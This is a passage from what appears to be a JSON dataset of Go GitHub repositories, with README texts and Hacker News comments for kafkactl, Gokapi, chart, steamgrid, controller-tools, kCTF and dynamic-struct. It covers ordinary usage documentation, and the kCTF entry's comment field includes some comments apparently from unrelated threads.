needed.\n\nTo produce message run\n```bash\nkafkactl produce --key '{\"fvalue\":1.2}' --key-proto-type TopicKey --value '{\"producedAt\":\"2021-12-01T14:10:12Z\",\"num\":\"1\"}' --value-proto-type TopicValue --proto-file kafkamsg.proto\n```\nor with protoset\n```bash\nkafkactl produce --key '{\"fvalue\":1.2}' --key-proto-type TopicKey --value '{\"producedAt\":\"2021-12-01T14:10:12Z\",\"num\":\"1\"}' --value-proto-type TopicValue --protoset-file kafkamsg.protoset\n```\n\nTo consume messages run\n```bash\nkafkactl consume --key-proto-type TopicKey --value-proto-type TopicValue --proto-file kafkamsg.proto\n```\nor with protoset\n```bash\nkafkactl consume --key-proto-type TopicKey --value-proto-type TopicValue --protoset-file kafkamsg.protoset\n```\n\n### Altering topics\n\nUsing the `alter topic` command allows you to change the partition count, replication factor and topic-level\nconfigurations of an existing topic.\n\nThe partition count can be increased with:\n```bash\nkafkactl alter topic my-topic --partitions 32\n```\n\nThe replication factor can be altered with:\n```bash\nkafkactl alter topic my-topic --replication-factor 2\n```\n\n> :information_source: when altering replication factor, kafkactl tries to keep the number of replicas assigned to each\n> broker balanced. If you need more control over the assigned replicas use `alter partition` directly.\n\nThe topic configs can be edited by supplying key value pairs as follows:\n```bash\nkafkactl alter topic my-topic --config retention.ms=3600000 --config cleanup.policy=compact\n```\n\n> :bulb: use the flag `--validate-only` to perform a dry-run without actually modifying the topic \n\n### Altering partitions\n\nThe assigned replicas of a partition can directly be altered with:\n```bash\n# set brokers 102,103 as replicas for partition 3 of topic my-topic\nkafkactl alter topic my-topic 3 -r 102,103\n```\n\n### Clone topic\n\nNew topic may be created from existing topic as follows:\n```bash\nkafkactl clone topic source-topic target-topic\n```\n\nSource topic must exist, target topic must not exist.\n`kafkactl` clones partitions count, replication factor and config entries.\n\n### Consumer groups\n\nIn order to get a list of consumer groups the `get consumer-groups` command can be used:\n```bash\n# all available consumer groups\nkafkactl get consumer-groups \n# only consumer groups for a single topic\nkafkactl get consumer-groups --topic my-topic\n# using command alias\nkafkactl get cg\n```\n\nTo get detailed information about the consumer group use `describe consumer-group`. If the parameter `--partitions`\nis provided details will be printed for each partition otherwise the partitions are aggregated to the clients.\n\n```bash\n# describe a consumer group\nkafkactl describe consumer-group my-group \n# show partition details only for partitions with lag\nkafkactl describe consumer-group my-group --only-with-lag\n# show details only for a single topic\nkafkactl describe consumer-group my-group --topic my-topic\n# using command alias\nkafkactl describe cg my-group\n```\n\n### Create consumer groups\n\nA consumer-group can be created as follows:\n\n```bash\n# create group with offset for all partitions set to oldest\nkafkactl create consumer-group my-group --topic my-topic --oldest\n# create group with offset for all partitions set to newest\nkafkactl create consumer-group my-group --topic my-topic --newest\n# create group with offset for a single partition set to specific offset\nkafkactl create consumer-group my-group --topic my-topic --partition 5 --offset 100\n# create group for multiple topics with offset for all partitions set to oldest\nkafkactl create consumer-group my-group --topic my-topic-a --topic my-topic-b --oldest\n```\n\n### Clone consumer group\n\nA consumer group may be created as clone of another consumer group as follows:\n```bash\nkafkactl clone consumer-group source-group target-group\n```\n\nSource group must exist and have committed offsets. Target group must not exist or don't have committed offsets.\n`kafkactl` clones topic assignment and partition offsets.\n\n### Reset consumer group offsets\n\nin order to ensure the reset does what it is expected, per default only\nthe results are printed without actually executing it. Use the additional parameter `--execute` to perform the reset. \n\n```bash\n# reset offset of for all partitions to oldest offset\nkafkactl reset offset my-group --topic my-topic --oldest\n# reset offset of for all partitions to newest offset\nkafkactl reset offset my-group --topic my-topic --newest\n# reset offset for a single partition to specific offset\nkafkactl reset offset my-group --topic my-topic --partition 5 --offset 100\n# reset offset to newest for all topics in the group\nkafkactl reset offset my-group --all-topics --newest\n# reset offset of for all partitions on multiple topics to oldest offset\nkafkactl reset offset my-group --topic my-topic-a --topic my-topic-b --oldest\n```\n\n### Delete consumer group offsets\n\nIn order to delete a consumer group offset use `delete offset`\n\n```bash\n# delete offset for all partitions of topic my-topic\nkafkactl delete offset my-group --topic my-topic\n# delete offset for partition 1 of topic my-topic\nkafkactl delete offset my-group --topic my-topic --partition 1\n```\n\n### Delete consumer groups\n\nIn order to delete a consumer group or a list of consumer groups use `delete consumer-group`\n\n```bash\n# delete consumer group my-group\nkafkactl delete consumer-group my-group\n```\n\n### ACL Management\n\nAvailable ACL operations are documented [here](https://docs.confluent.io/platform/current/kafka/authorization.html#operations).\n\n#### Create a new ACL\n\n```bash\n# create an acl that allows topic read for a user 'consumer'\nkafkactl create acl --topic my-topic --operation read --principal User:consumer --allow\n# create an acl that denies topic write for a user 'consumer' coming from a specific host\nkafkactl create acl --topic my-topic --operation write --host 1.2.3.4 --principal User:consumer --deny\n# allow multiple operations\nkafkactl create acl --topic my-topic --operation read --operation describe --principal User:consumer --allow\n# allow on all topics with prefix common prefix\nkafkactl create acl --topic my-prefix --pattern prefixed --operation read --principal User:consumer --allow\n```\n\n#### List ACLs\n\n```bash\n# list all acl\nkafkactl get acl\n# list all acl (alias command)\nkafkactl get access-control-list\n# filter only topic resources\nkafkactl get acl --topics\n# filter only consumer group resources with operation read\nkafkactl get acl --groups --operation read\n```\n\n#### Delete ACLs\n\n```bash\n# delete all topic read acls\nkafkactl delete acl --topics --operation read --pattern any\n# delete all topic acls for any operation\nkafkactl delete acl --topics --operation any --pattern any\n# delete all cluster acls for any operation\nkafkactl delete acl --cluster --operation any --pattern any\n# delete all consumer-group acls with operation describe, patternType prefixed and permissionType allow\nkafkactl delete acl --groups --operation describe --pattern prefixed --allow\n```\n\n### Getting Brokers\n\nTo get the list of brokers of a kafka cluster use `get brokers`\n\n```bash\n# get the list of brokers\nkafkactl get brokers\n```\n\n### Describe Broker\n\nTo view configs for a single broker use `describe broker`\n\n```bash\n# describe broker\nkafkactl describe broker 1\n```\n\n## Development\n\nIn order to see linter errors before commit, add the following pre-commit hook:\n\n```bash\npip install --user pre-commit\npre-commit install\n```\n\n### Pull requests\n\n```shell\n# checkout locally\nPULL_REQUEST_ID=123\nLOCAL_BRANCH_NAME=feature/abc\ngit fetch origin pull/${PULL_REQUEST_ID}/head:${LOCAL_BRANCH_NAME}\ngit checkout ${LOCAL_BRANCH_NAME}\n\n# push to PR\nNAME=username\nREMOTE_BRANCH_NAME=abc\ngit remote add $NAME git@github.com:$NAME/kafkactl.git\ngit push $NAME ${LOCAL_BRANCH_NAME}:${REMOTE_BRANCH_NAME}\n```\n", "readme_type": "markdown", "hn_comments": "This is a nice little CLI tool one of my colleagues recently wrote to simplify managing Kafka clusters. Think of kubectl for Apache Kafka.It's a single binary that can easily be dropped on any server.You can configure one or more clusters in a YAML file, so you don't have to remember all Kafka nodes. It also has smart auto-completion for bash and zsh that leverages your configuration file.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Forceu/Gokapi", "link": "https://github.com/Forceu/Gokapi", "tags": ["selfhosted", "self-hosted", "download", "uploader", "firefox-send", "golang", "s3-storage", "backblaze-b2", "ownyourdata", "docker", "ssl"], "stars": 539, "description": "Lightweight selfhosted Firefox Send alternative without public upload. AWS S3 supported.", "lang": "Go", "repo_lang": "", "readme": "# Gokapi\n[![Documentation Status](https://readthedocs.org/projects/gokapi/badge/?version=latest)](https://gokapi.readthedocs.io/en/stable/?badge=stable)\n[![Go Report Card](https://goreportcard.com/badge/github.com/forceu/gokapi)](https://goreportcard.com/report/github.com/forceu/gokapi)\n![gopherbadger-tag-do-not-edit](https://img.shields.io/badge/Go%20Coverage-91%25-brightgreen.svg?longCache=true&style=flat)\n[![Docker Pulls](https://img.shields.io/docker/pulls/f0rc3/gokapi.svg)](https://hub.docker.com/r/f0rc3/gokapi/)\n\n\n### Available for:\n\n- Bare Metal\n- [Docker](https://hub.docker.com/r/f0rc3/gokapi)\n\n## About\n\nGokapi is a lightweight server to share files, which expire after a set amount of downloads or days. It is similar to the discontinued [Firefox Send](https://github.com/mozilla/send), with the difference that only the admin is allowed to upload files. \n\nThis enables companies or individuals to share their files very easily and having them removed afterwards, therefore saving disk space and having control over who downloads the file from the server.\n\nIdentical files will be deduplicated. An API is available to interact with Gokapi. AWS S3 and Backblaze B2 can be used instead of local storage. Customization is very easy with HTML/CSS knowledge. Encryption including end-to-end encryption is available.\n\n\n## Screenshots\nAdmin Menu ![image](https://user-images.githubusercontent.com/1593467/185140322-d6287e6b-ddfc-4987-a2df-9491ba1a2e1d.png)\n\n\nDownload Link ![image](https://user-images.githubusercontent.com/1593467/185140498-2df46c7e-bd95-4f46-8ec5-21ec1e415d90.png)\n\n\n\n\n\n\n## Installation\n\nCan be deployed in only a few seconds. Please refer to the [documentation](https://gokapi.readthedocs.io/en/latest/setup.html)\n\n## Usage\n\nPlease refer to the [documentation](https://gokapi.readthedocs.io/en/latest/usage.html)\n\n## Contributors\n\n \n\n\n## License\n\nThis project is licensed under the AGPL3 - see the [LICENSE.md](LICENSE.md) file for details\n\n\n## Donations\n\nAs with all Free software, the power is less in the finances and more in the collective efforts. I really appreciate every pull request and bug report offered up by our users! If however, you're not one for coding/design/documentation, and would like to contribute financially, you can do so with the link below. Every help is very much appreciated!\n\n[![paypal](https://img.shields.io/badge/Donate-PayPal-green.svg)](https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=donate@bulling.mobi&lc=US&item_name=BarcodeBuddy&no_note=0&cn=¤cy_code=EUR&bn=PP-DonationsBF:btn_donateCC_LG.gif:NonHosted) [![LiberaPay](https://img.shields.io/badge/Donate-LiberaPay-green.svg)](https://liberapay.com/MBulling/donate)\n\n\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "marianogappa/chart", "link": "https://github.com/marianogappa/chart", "tags": ["charting-library", "chart", "graphs", "chartjs"], "stars": 538, "description": "Quick & smart charting for STDIN", "lang": "Go", "repo_lang": "", "readme": "# chart [![Build Status](https://img.shields.io/travis/marianogappa/chart.svg)](https://travis-ci.org/marianogappa/chart) [![Coverage Status](https://coveralls.io/repos/github/MarianoGappa/chart/badge.svg?branch=master)](https://coveralls.io/github/MarianoGappa/chart?branch=master) [![GitHub license](https://img.shields.io/badge/license-MIT-blue.svg)](https://raw.githubusercontent.com/marianogappa/chart/master/LICENSE) [![Go Report Card](https://goreportcard.com/badge/github.com/marianogappa/chart?style=flat-square)](https://goreportcard.com/report/github.com/marianogappa/chart)\n\nQuick & smart charting for STDIN\n\n[Blogpost](https://movio.co/en/blog/improving-with-sql-and-charts/)\n\n![Chart example use](img/chart.gif?v=1)\n\n## Learn by example!\n\n[Cheatsheet](https://marianogappa.github.io/chart/)\n\n## Syntax\n\n```\nchart [options]\n```\n\n- `pie`: render a pie chart\n- `bar`: render a bar chart\n- `line`: render a line chart\n- `scatter`: render a scatter plot chart\n- `log`: use logarithmic scale (bar chart only)\n- `legacy-color`: use legacy colors\n- `gradient`: use color gradients\n- `' '|';'|','|'\\t'`: this character separates columns on each line (\\t = default)\n- `-t|--title`: title for the chart\n- `-x`: label for the x axis\n- `-y`: label for the y axis\n- `--date-format`: Sets the date format, according to [https://golang.org/src/time/format.go](https://golang.org/src/time/format.go)\n- `--debug`: Use to make sure to double-check the chart is showing what you expect.\n- `-h|--help`: Show help\n- `--zero-based`: Makes y-axis begin at zero\n\n## Installation\n\n```\ngo get -u github.com/marianogappa/chart\n```\n\nor get the latest binary for your OS in the [Releases section](https://github.com/marianogappa/chart/v4/releases).\n\n## Example use cases\n\n- Pie chart of your most used terminal commands\n```\nhistory | awk '{print $2}' | chart\n```\n\n![Pie chart of your most used terminal commands](img/pie.png?v=1)\n\n- Bar chart of today's currency value against USD, in logarithmic scale\n```\ncurl -s http://api.fixer.io/latest?base=USD | jq -r \".rates | to_entries| \\\n map(\\\"\\(.key)\\t\\(.value|tostring)\\\")|.[]\" | chart bar log -t \"Currency value against USD\"\n```\n\n![Bar chart of today's currency value against USD, in logarithmic scale](img/bar-log.png?v=1)\n\n- Bar chart of a Github user's lines of code per language (requires setting up an Access Token)\n```\nUSER=???\nACCESS_TOKEN=???\ncurl -u $USER:$ACCESS_TOKEN -s \"https://api.github.com/user/repos\" | \\\n jq -r 'map(.languages_url) | .[]' | xargs curl -s -u $USER:$ACCESS_TOKEN | \\\n jq -r '. as $in| keys[] | [.+ \" \"]+[$in[.] | tostring] | add' | \\\n awk '{arr[$1]+=$2} END {for (i in arr) {print i,arr[i]}}' | \\\n awk '{print $2 \"\\t\" $1}' | sort -nr | chart bar\n```\n\n![Bar chart of a Github user's lines of code per language (requires setting up an Access Token)](img/bar.png?v=1)\n\n- Line chart of the stargazers of this repo over time up to Jan 2017 (received some attention after the publication of [this](https://movio.co/blog/migrate-Scala-to-Go/) blogpost)\n```\ncurl -s \"https://api.github.com/repos/marianogappa/chart/stargazers?page=1&per_page=100\" \\\n-H\"Accept: application/vnd.github.v3.star+json\" | \\\njq --raw-output 'map(.starred_at) | .[]' | awk '{print NR \"\\t\" $0}' | \\\nchart line --date-format 2006-01-02T15:04:05Z\n```\n\n![Line chart of Github stargazers of this repo over time](img/line.png?v-1)\n\n## Charting MySQL output\n\n`chart` works great with [sql](https://github.com/MarianoGappa/sql), or with any `mysql -Nsre '...'` query.\n\n## I don't trust the chart is correct\n\nMe neither. Add `--debug` to double-check (e.g. some rows could be being ignored due to parse failures, separator could be incorrect, column types could be inferred wrongly).\n\n```\n$ cat /tmp/c | ./chart bar --debug\nLines read 3\nLine format inferred ff\nLines used 3\nFloat column count 2\nString column count 0\nDate/Time column count 0\nChart type bar\nScale type linear\nSeparator [tab]\n```\n\n## Details\n\n- `chart` infers STDIN format by analysing line format on each line (doesn't infer separator though; defaults to `\\t`) and computing the winner format.\n- it uses the awesome [ChartJS](http://www.chartjs.org/) library to plot the charts.\n- when input data is string-only, `chart` infers a \"word frequency pie chart\" use case.\n- should work on Linux/Mac/Windows thanks to [open-golang](https://github.com/skratchdot/open-golang).\n\n## Known issues\n\n- Javascript's floating point messes up y-axis https://github.com/marianogappa/chart/v4/issues/15\n- No histogram support (ChartJS doesn't provide it) https://github.com/marianogappa/chart/v4/issues/22\n\n## Contribute\n\nPRs are greatly appreciated and are currently [being merged](https://github.com/marianogappa/chart/v4/pull/3).\nIf you have a use case that is not supported by `chart`, [I'd love to hear about it](https://github.com/marianogappa/chart/v4/issues), but if it's too complex I'd recommend you to try [gnuplot](http://www.gnuplot.info/).\n\n### Development\n\n- Requires Go version >= 1.11 with module support for building and testing.\n\n- Requires [Goreleaser](https://goreleaser.com) for building and publishing releases.\n\n- See [Makefile](./Makefile) for build and test commands.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "boppreh/steamgrid", "link": "https://github.com/boppreh/steamgrid", "tags": [], "stars": 538, "description": "Downloads images to fill your Steam grid view", "lang": "Go", "repo_lang": "", "readme": "# What is it? #\n\n**SteamGrid** is a standalone, fire-and-forget program to enhance Steam's grid view and Big Picture. It preloads the banner images for all your games (even non-Steam ones) and applies overlays depending on your categories.\n\nYou run it once, and it'll set up everything above, automatically, keeping your existing custom images. You can run\nagain when you get more games or want to update the category overlays.\n\n# Download #\n\n[**steamgrid-windows.zip (4.4\u00a0MB)**](https://github.com/boppreh/steamgrid/releases/latest/download/steamgrid_windows.zip)\n\n[**steamgrid-linux.zip (4.5\u00a0MB)**](https://github.com/boppreh/steamgrid/releases/latest/download/steamgrid_linux.zip)\n\n[**steamgrid-mac.zip (4.6\u00a0MB)**](https://github.com/boppreh/steamgrid/releases/latest/download/steamgrid_mac.zip)\n\n# How to use #\n\n1. Download the [latest version](https://github.com/boppreh/steamgrid/releases/latest) and extract the zip wherever.\n2. *(optional)* Name the overlays after your categories. So if you have a category \u201cGames I Love\u201d, put a nice little heart overlay there named `games i love.banner.png`. You can rename the defaults that came with the zip or get new ones at [/r/steamgrid](http://www.reddit.com/r/steamgrid/wiki/overlays).\n * Add the extension `.banner` before the image extension for banner art: `games i love.banner.png`\n * Add the extension `.cover` before the image extension for cover art: `games i love.cover.png`\n * Add the extension `.hero` before the image extension for hero art `games i love.hero.png`\n * Add the extension `.logo` before the image extension for logo art `games i love.logo.png`\n3. *(optional)* Download a pack of custom images and place it in the `games/` folder. The image files can be either the name of the game (e.g. `Psychonauts.banner.png`) or the game id (e.g. `3830.png`).\n * Add the extension `.banner` before the image extension for banner art: `Psychonauts.banner.png`, `3830.png`\n * Add the extension `.cover`/`p` before the image extension for cover art: `Psychonauts.cover.png`, `3830p.png`\n * Add the extension `.hero`/`_hero` before the image extension for hero art `Psychonauts.hero.png`, `3830_hero.png`\n * Add the extension `.logo`/`_hero` before the image extension for logo art `Psychonauts.logo.png`, `3830_logo.png`\n4. *(optional)* Generate a some API Keys to enhance the automatic search:\n * [SteamGridDB API Key](https://www.steamgriddb.com/profile/preferences)\n * [IGDB API Client/Secret](https://api-docs.igdb.com/#about)\n5. Run `steamgrid` and wait. No, really, it's all automatic. Not a single key press required.\n * *(optional)* Append `--steamgriddb ` if you've generated one before.\n * *(optional)* Append `--igdbclient ` if you've genereated one before.\n * *(optional)* Append `--igdbsecret ` if you've genereated one before.\n * *(optional)* Append `--types ` to choose your preferences between animated steam covers or static ones Available choices : `animated`,`static`. Default : `static`. You can use `animated,static` to download both while preferring animated covers, and `static,animated` for preferring static covers.\n * *(optional)* Append `--styles ` to choose your preferences between the different covers styles from steamgriddb. Available choices : `material`,`white_logo`,`alternate`,`blurred`,`no_logo`. Default: `alternate`. You can also input multiple comma-separated choices in the same manners of the `--types` argument.\n * *(optional)* Append `--appids ` to only process the specified appID(s)\n * *(optional)* Append `--onlymissingartwork` to only download artworks missing on the official servers.\n * *(optional)* Append `-nonsteamonly` to only search artworks for non-steam games added onto the Steam client.\n * *(optional)* Append `-skip` to skip searching and downloading parts from certain artwork elements. Available choices : `-skipbanner`,`-skipcover`,`-skiphero`,`-skiplogo`. For example: Appending `-skiplogo -skipbanner` will prevent steamgrid to search and download logo and banners for any games.\n * *(optional)* Append `-skipsteam` to not download the default artworks from Steam.\n * *(optional)* Append `-skipgoogle` to skip search and downloads from Google.\n * *(tip)* Run with `--help` to see all available options again.\n6. Read the report and open Steam in grid view to check the results.\n\n---\n\n[![Results](https://i.imgur.com/HiBCe7p.png)](https://i.imgur.com/HiBCe7p.png)\n[![Grid view screenshot](http://i.imgur.com/abnqZ6C.png)](http://i.imgur.com/abnqZ6C.png)\n[![Big Picture screenshot](http://i.imgur.com/gv7xDda.png)](http://i.imgur.com/gv7xDda.png)\n\n# Features #\n\n- Grid images are used both in the grid view and Big Picture mode, and SteamGrid works on both.\n- Automatically detects Steam installation even in foreign language systems. If\n it still doesn't work for you, just drag and drop the Steam installation folder\n onto the executable for a manual override.\n- Detects all local Steam users and customizes their grid images individually.\n- Downloads images from two different servers, and falls back to a Google\n search as last resort (don't worry, it'll tell you if that happens).\n- If a game is missing an official banner *and* a name (common for prototypes), it gets the name\n from SteamDB and google searches the banner.\n- Loads your categories from the local Steam installation.\n- Applies transparent overlays based on each game categories (make sure the name\n of the overlay file is the name of the category).\n- If you already have any customized images, it'll use them and apply the\n overlay, but keeping a backup.\n- If you have images in the directory `games/`, it'll search by game name or by id and use them.\n- Works just as well with non-Steam games.\n- Supports PNG and JPG images.\n- Supports games with multiple categories.\n- No installation required, just extract the zip and double click.\n- Works with Windows, Linux, and macOS, 32 or 64 bit.\n- 100% fire and forget, no interaction required, and can cancel and retry at any moment.\n\n# Something wrong? #\n\n- **Why are there crowns and other icons on top of my images?**: Those are the default overlays for categories, found in the folder `overlays by category/`. You can download new ones, or just delete the file and re-run SteamGrid to remove the overlay.\n- **Fails to find steam location**: You can drag and drop the Steam installation folder (not the library!) into `steamgrid.exe` for a manual override.\n- **A few images were not found**: Some images are hard to find. The program may miss a game, especially betas, prototypes and tests, but you can set an image manually through the Steam client (right click > `Set Custom Image`). Run `steamgrid` again to apply the overlays. If you know a good source of images, drop me a message.\n- **No overlays found**: make sure you put your overlays inside the `overlays by category` folder, and it's near the program itself. This error means absolutely no overlays were found, without even taking your categories names into consideration.\n- **It didn't apply any overlays**: ensure the overlay file name matches your category name, including possible punctuation (differences in caps are ignored). For example, `favorites.png` is used for the `Favorites` category.\n- **I'm worried this is a virus**: I work with security, so no offense taken from a little paranoia. The complete source code is provided at this [Github repo](https://github.com/boppreh/steamgrid). If you are worried the binaries don't match the source, you can install Go on your machine and run the sources directly. All it does is save images inside `Steam/userdata/ID/config/grid`. It does connect to the internet, but only to fetch game names from you Steam profile and download images into the Steam's grid image folder. Nothing is installed or saved in the Windows registry, and aside from images downloaded, it should leave the computer exactly as it found.\n\nIf you encounter any problems, please [open an issue](https://github.com/boppreh/steamgrid/issues/new). All critics and suggestions are welcome.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubernetes-sigs/controller-tools", "link": "https://github.com/kubernetes-sigs/controller-tools", "tags": ["k8s-sig-api-machinery"], "stars": 538, "description": "Tools to use with the controller-runtime libraries", "lang": "Go", "repo_lang": "", "readme": "[![Go Reference](https://pkg.go.dev/badge/sigs.k8s.io/controller-tools.svg)](https://pkg.go.dev/sigs.k8s.io/controller-tools)\n[![Build Status](https://travis-ci.org/kubernetes-sigs/controller-tools.svg?branch=master)](https://travis-ci.org/kubernetes-sigs/controller-tools \"Travis\")\n[![Go Report Card](https://goreportcard.com/badge/sigs.k8s.io/controller-tools)](https://goreportcard.com/report/sigs.k8s.io/controller-tools)\n\n# Kubernetes controller-tools Project\n\nThe Kubernetes controller-tools Project is a set of go libraries for building Controllers.\n\n## Development\n\nClone this project, and iterate on changes by running `./test.sh`.\n\nThis project uses Go modules to manage its dependencies, so feel free to work from outside\nof your `GOPATH`. However, if you'd like to continue to work from within your `GOPATH`, please\nexport `GO111MODULE=on`.\n\n## Releasing and Versioning\n\nSee [VERSIONING.md](VERSIONING.md).\n\n## Community, discussion, contribution, and support\n\nLearn how to engage with the Kubernetes community on the [community page](http://kubernetes.io/community/).\n\ncontroller-tools is a subproject of the [kubebuilder](https://sigs.k8s.io/kubebuilder) project\nin sig apimachinery.\n\nYou can reach the maintainers of this project at:\n\n- Slack channel: [#kubebuilder](http://slack.k8s.io/#kubebuilder)\n- Google Group: [kubebuilder@googlegroups.com](https://groups.google.com/forum/#!forum/kubebuilder)\n\n### Code of conduct\n\nParticipation in the Kubernetes community is governed by the [Kubernetes Code of Conduct](code-of-conduct.md).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "google/kctf", "link": "https://github.com/google/kctf", "tags": [], "stars": 538, "description": "kCTF is a Kubernetes-based infrastructure for CTF competitions. For documentation, see", "lang": "Go", "repo_lang": "", "readme": "# kCTF\n[![GKE Deployment](https://github.com/google/kctf/workflows/GKE%20Deployment/badge.svg?branch=master)](https://github.com/google/kctf/actions?query=workflow%3A%22GKE+Deployment%22)\n\nkCTF is a Kubernetes-based infrastructure for CTF competitions.\n\n## Prerequisites\n\n* [gcloud](https://cloud.google.com/sdk/install)\n* [docker](https://docs.docker.com/install/)\n\n## Getting Started / Documentation\n\nFor an introduction to what kCTF is and how it interacts with Kubernetes, see [kCTF in 8 Minutes](https://google.github.io/kctf/introduction.html).\n\nAdditional documentation resources are:\n\n* **[Local Testing Walkthrough](https://google.github.io/kctf/local-testing.html) \u2013 A quick start guide showing you how to build and test challenges locally.**\n* [Google Cloud Walkthrough](https://google.github.io/kctf/google-cloud.html) \u2013 Once you have everything up and running, try deploying to Google Cloud. \n* [Troubleshooting](https://google.github.io/kctf/troubleshooting.html) \u2013 Help with fixing broken challenges.\n* [Security Threat Model](https://google.github.io/kctf/security-threat-model.html) \u2013 Security considerations regarding kCTF including information on assets, risks, and potential attackers.\n", "readme_type": "markdown", "hn_comments": "Shouldn't you be collecting responses from non-homeschoolers too to be able to tell how homeschoolers are \"lonely relative to\" them?I imagine any pre-pandemic data (if that's what you were going against) is going to be skewed in comparison to pandemic data.Thanks for flagging (heh)! I had no idea this was happening but I always learn so much. Bummer there's no beginner quest, I never did get around to finishing last year's challenges.\"[...] WORLDWIDE, EXCEPT FOR QUEBEC, CRIMEA, CUBA, IRAN, SYRIA, NORTH KOREA, and\nSUDAN\"Huh? What's wrong with Quebec?Dig at Apple from the third stage of the beginners' quest;\"Your first thought is \"Why does the display stand need to announce its price? And exactly how much does 999 dollars convert to in Xenonivian Bucklets?\"I notice they're continuing the proud silicon valley start-up tradition of building a website that doesn't actually tell you what Google CTF is :PEven when I click on the beginner's quest, I've got paths, flags, endings, challenges......but nothing to tell me what the hell the thing actually IS!> Q: I got an error: PERMISSION_DENIED: Permission denied.> A: Try picking a different team name, the team name you inserted is already taken.A: How to tell your software was built by security people.Three of the problems in the beginners quest have 2 flags. In two of the problems, the problems themselves tell you that there are two flags (or give you very obvious hints), but I have no idea which one is the third problem that has a second let alone how to get it...could anyone give me a hint?CTF = Capture The Flag(I didn't know what it stood for at first).I'm lost on the beginners task. These things always make me feel stupid.Does someone do in-depth posts/videos/talks about any of these (Google or FB) CTF challenges by breaking up what is happening, what, why and how they tried per challenege and how did they finally come to the solution step-by-step?These things have always intimidated me and I'd love to know more.> Q: I got an error: This browser is not supported or 3rd party cookies and data may be disabled.> A: Enable 3rd party cookies.Come on Google, why do you require third party cookies for a competition amongst the most privacy conscience people on the planet?Firefox ext:Canvas blocker crashes on your site.I\u2019m always amazed how a company that creates the world\u2019s most popular mobile OS and web browser is unable to code a decent mobile webpage.Scrolling this page is sufferable, anchor links don\u2019t work well, etc. Basic stuff.Look no further than G Suite, Google Cloud for more examples.> Eligibility: The Contest is open to individuals who are (1) over the age of eighteen (18) at the time of entry; (2) not a resident of Quebec, Cuba, Iran, Syria, North Korea, Sudan, or Crimea; [1]Why Quebec is banned?https://buildyourfuture.withgoogle.com/events/ctf/#!?detail-...Can\u2019t wait until Facebook team wins itAcronyms suckI don't know about anyone else but this is a pretty hard ctf. It's a lot harder than other ones onlinestuck on https://govagriculture.web.ctfcompetition.com/ this task, any help?The emoji virtual machine (step 3 or 4) is cool. I'm trying to understand what it does to speed it up.There is no magic. You have to try things. There are two things that worked for me personally:* Study the technology in order to find out potential oversights and design problems.\n* Fuzz test it to find problems by brute force.Keep in mind that the more you practice the better you become at it. Your intuition will start to help you filter things that are worth exploring and as such get more fruitful results faster. While you can read about vulnerability research techniques, your intuition will only grow through practice and experience.Also the more bugs you discover the more confident you become which also helps in the long run because in many situations you will not know what you are doing but you believe strongly that you will find something.Also, keep in mind that while security researcher are smart people, what they do is not that genius at the end of the day. When you are reading someones awesome research you may come to the conclusion that the work had the same logical development as outlined in the paper - a stroke of a genius. It does not work quite like that in reality. It only makes sense at the end. It does not make that much sense in the process. You just fake it until you make it. :)So yah, the way you make the jump from using tools to finding vulnerabilities yourself is by making that jump. Pick a small target area of research first and grow from there.fwiw, if you have the Instapaper extension installed it has the option to insert itself into Hacker News among other sites.The official Pocket Chrome extension also inserts itself inline onto HN pages. Not to mention, it appears this extension hasn't been updated in over 2 years.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Ompluscator/dynamic-struct", "link": "https://github.com/Ompluscator/dynamic-struct", "tags": ["go", "golang", "dynamic", "structs", "runtime"], "stars": 538, "description": "Golang package for editing struct's fields during runtime and mapping structs to other structs.", "lang": "Go", "repo_lang": "", "readme": "[![Go Reference](https://pkg.go.dev/badge/github.com/Ompluscator/dynamic-struct.svg)](https://pkg.go.dev/github.com/Ompluscator/dynamic-struct)\n![Coverage](https://img.shields.io/badge/Coverage-92.6%25-brightgreen)\n[![Go Report Card](https://goreportcard.com/badge/github.com/ompluscator/dynamic-struct)](https://goreportcard.com/report/github.com/ompluscator/dynamic-struct)\n\n# Golang dynamic struct\n\nPackage dynamic struct provides possibility to dynamically, in runtime,\nextend or merge existing defined structs or to provide completely new struct.\n\nMain features:\n* Building completely new struct in runtime\n* Extending existing struct in runtime\n* Merging multiple structs in runtime\n* Adding new fields into struct\n* Removing existing fields from struct\n* Modifying fields' types and tags\n* Easy reading of dynamic structs\n* Mapping dynamic struct with set values to existing struct\n* Make slices and maps of dynamic structs\n\nWorks out-of-the-box with:\n* https://github.com/go-playground/form\n* https://github.com/go-playground/validator\n* https://github.com/leebenson/conform\n* https://golang.org/pkg/encoding/json/\n* ...\n\n## Benchmarks\n\nEnvironment:\n* MacBook Pro (13-inch, Early 2015), 2,7 GHz Intel Core i5\n* go version go1.11 darwin/amd64\n\n```\ngoos: darwin\ngoarch: amd64\npkg: github.com/ompluscator/dynamic-struct\nBenchmarkClassicWay_NewInstance-4 2000000000 0.34 ns/op\nBenchmarkNewStruct_NewInstance-4 10000000 141 ns/op\nBenchmarkNewStruct_NewInstance_Parallel-4 20000000 89.6 ns/op\nBenchmarkExtendStruct_NewInstance-4 10000000 135 ns/op\nBenchmarkExtendStruct_NewInstance_Parallel-4 20000000 89.5 ns/op\nBenchmarkMergeStructs_NewInstance-4 10000000 140 ns/op\nBenchmarkMergeStructs_NewInstance_Parallel-4 20000000 94.3 ns/op\n```\n\n## Add new struct\n```go\npackage main\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"log\"\n\n\t\"github.com/ompluscator/dynamic-struct\"\n)\n\nfunc main() {\n\tinstance := dynamicstruct.NewStruct().\n\t\tAddField(\"Integer\", 0, `json:\"int\"`).\n\t\tAddField(\"Text\", \"\", `json:\"someText\"`).\n\t\tAddField(\"Float\", 0.0, `json:\"double\"`).\n\t\tAddField(\"Boolean\", false, \"\").\n\t\tAddField(\"Slice\", []int{}, \"\").\n\t\tAddField(\"Anonymous\", \"\", 